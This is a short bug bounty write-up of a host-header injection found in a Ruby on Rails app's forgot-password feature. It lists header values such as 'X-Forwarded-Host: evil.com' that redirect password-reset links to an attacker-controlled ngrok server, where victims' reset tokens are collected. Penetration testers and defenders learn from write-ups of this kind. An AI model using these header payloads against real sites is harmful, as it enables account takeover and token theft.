Pwn Them All #BugBounty

Recently I was Pentesting a private program The web app was built on “Ruby on Rails”, I was testing ‘forgot password’ functionality, of course, why not?

I was surprised when I saw that the endpoint was vulnerable to Host-Header Injection so, here are the steps of how I was able to exploit it. First I fired up python local server running on port 8080 along with ngrok on port 80

python server with ngrok

I fired up my burp and firefox typed the URL again to capture the request for further testing. I typed my email in the forgot password form, when I intercept the request first I tried every header like

X-Host: evil.com
X-Server: evil.com
X-Forwarded-For: evil.com
X-Forwarded-Host: evil.com

password reset form

captured request

I tried every header and the one which worked for me here was

X-Forwarded-Host: evil.com

confirmation

Got confirmation about the email has been sent to my email

the host changed to mine host

Original Host replaced by the evil host (ngrok/mine host). Now victims click the link and I GET a request with the password token of the user

victims click and code sent to my server